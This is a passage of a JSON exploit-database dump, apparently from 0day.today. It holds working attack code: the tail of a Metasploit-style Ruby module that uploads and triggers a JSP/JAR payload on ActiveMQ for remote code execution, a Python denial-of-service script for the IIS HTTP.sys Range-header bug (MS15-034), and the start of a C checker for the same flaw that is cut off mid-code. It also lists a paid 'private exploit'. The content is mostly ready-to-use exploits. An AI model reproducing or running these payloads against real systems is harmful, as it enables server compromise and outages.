c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\r\n %>}\r\n end\r\n\r\n def exploit\r\n jar_payload = payload.encoded_jar.pack\r\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\r\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n @url = datastore['SSL'] ? \"https://#{host}\" : \"http://#{host}\"\r\n paths = get_upload_paths\r\n paths.each do |path|\r\n if try_upload(path, jar_payload, payload_name)\r\n break handler if trigger_payload(payload_name)\r\n print_error('Unable to trigger payload')\r\n end\r\n end\r\n end\r\n\r\n def try_upload(path, jar_payload, payload_name)\r\n ['.jar', '.jsp'].each do |ext|\r\n file_name = payload_name + ext\r\n data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload\r\n move_headers = { 'Destination' => \"#{@url}#{path}#{file_name}\" }\r\n upload_uri = normalize_uri('fileserver', file_name)\r\n print_status(\"Uploading #{move_headers['Destination']}\")\r\n register_files_for_cleanup \"#{path}#{file_name}\" if datastore['AutoCleanup'].casecmp('true')\r\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\r\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\r\n @trigger_resource = /webapps(.*)/.match(path)[1]\r\n end\r\n true\r\n end\r\n\r\n def get_upload_paths\r\n base_path = \"#{get_install_path}/webapps\"\r\n custom_path = datastore['UploadPath']\r\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\r\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\r\n end\r\n\r\n def get_install_path\r\n properties_page = send_request('GET', \"#{@url}/admin/test/systemProperties.jsp\").body\r\n match = properties_page.tr(\"\\n\", '@').match(/activemq\\.home<\\/td>@\\s*<td>([^@]+)<\\/td>/)\r\n return match[1] unless match.nil?\r\n end\r\n\r\n def send_request(method, uri, expected_response = 200, opts = {})\r\n opts['headers'] ||= {}\r\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\r\n opts['headers']['Connection'] = 'close'\r\n r = send_request_cgi(\r\n {\r\n 'method' => method,\r\n 'uri' => uri\r\n }.merge(opts)\r\n )\r\n return false if r.nil? || expected_response != r.code.to_i\r\n r\r\n end\r\n\r\n def trigger_payload(payload_name)\r\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\r\n end\r\n\r\n def error_out\r\n print_error('Upload failed')\r\n @trigger_resource = nil\r\n false\r\n end\r\nend\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/28066", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-02T21:24:30", "description": "Reverdes from http.sys exploit includes ROP gadgets for Server 2008 and Server 2012 only!\n\nThis is private exploit. You can buy it at https://0day.today", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "zdt", "title": "MS15-034 Microsoft IIS Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-19T00:00:00", "id": "1337DAY-ID-23531", "href": "https://0day.today/exploit/description/23531", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-08T22:52:53", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2015-04-17T00:00:00", "type": "zdt", "title": "Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-17T00:00:00", "id": "1337DAY-ID-23524", "href": "https://0day.today/exploit/description/23524", "sourceData": "#Tested on Win Srv 2012R2.\r\nimport socket,sys\r\n \r\nif len(sys.argv)<=1:\r\n sys.exit('Give me an IP')\r\n \r\nHost = sys.argv[1]\r\n \r\ndef SendPayload(Payload, Host):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((Host, 80))\r\n s.send(Payload)\r\n s.recv(1024)\r\n s.close()\r\n \r\n#Make sure iisstart.htm exist.\r\nInit = \"GET /iisstart.htm HTTP/1.0\\r\\n\\r\\n\"\r\nPayload = \"GET /iisstart.htm HTTP/1.1\\r\\nHost: blah\\r\\nRange: bytes=18-18446744073709551615\\r\\n\\r\\n\"\r\n \r\nSendPayload(Init, Host)\r\nSendPayload(Payload, Host)\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/23524", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-03T01:36:34", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdt", "title": "Microsoft Window - HTTP.sys PoC (MS15-034)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-15T00:00:00", "id": "1337DAY-ID-23518", "href": "https://0day.today/exploit/description/23518", "sourceData": "/*\r\n UNTESTED - MS15-034 Checker\r\n \r\n THE BUG:\r\n \r\n 8a8b2112 56 push esi\r\n 8a8b2113 6a00 push 0\r\n 8a8b2115 2bc7 sub eax,edi\r\n 8a8b2117 6a01 push 1\r\n 8a8b2119 1bca sbb ecx,edx\r\n 8a8b211b 51 push ecx\r\n 8a8b211c 50 push eax\r\n 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here\r\n \r\n ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4\r\n \r\n BY: [email\u00a0protected]\r\n Twitter: @rhcp011235\r\n*/\r\n \r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <arpa/inet.h> \r\n \r\nint connect_to_server(char *ip)\r\n{\r\n int sockfd = 0, n = 0;\r\n \r\n struct sockaddr_in serv_addr;\r\n struct hostent *server;\r\n \r\n if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"\\n Error : Could not create socket \\n\");\r\n return 1;\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(80);\r\n if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)\r\n {\r\n printf(\"\\n inet_pton error occured\\n\");\r\n return 1;\r\n }\r\n if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"\\n Error : Connect Failed \\n\");\r\n return 1;\r\n } \r\n \r\n return sockfd;\r\n}\r\n \r\n \r\nint main(int argc, char *argv[])\r\n{\r\n int n = 0;\r\n int sockfd;\r\n char recvBuff[1024];\r\n \r\n // Check server\r\n char request[] = \"GET / HTTP/1.0\\r\\n\\r\\n\";\r\n \r\n // our evil buffer\r\n char request1[] = \"GET / HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-18446744073709551615\\r\\n\\r\\n\";\r\n \r\n \r\n if(argc != 2)\r\n {\r\n printf(\"\\n Usage: %s <ip of server> \\n\",argv[0]);\r\n return 1;\r\n } \r\n \r\n printf(\"[*] Audit Started\\n\");\r\n sockfd = connect_to_server(argv[1]);\r\n write(sockfd, request, strlen(request)); \r\n read(sockfd, recvBuff, sizeof(recvBuff)-1);\r\n \r\n if (!strstr(recvBuff,\"Microsoft\"))\r\n {\r\n printf(\"[*] NOT IIS\\n\");\r\n exit(1);\r\n }\r\n \r\
CISA Adds 15 Known Exploited Vulnerabilities to Catalog
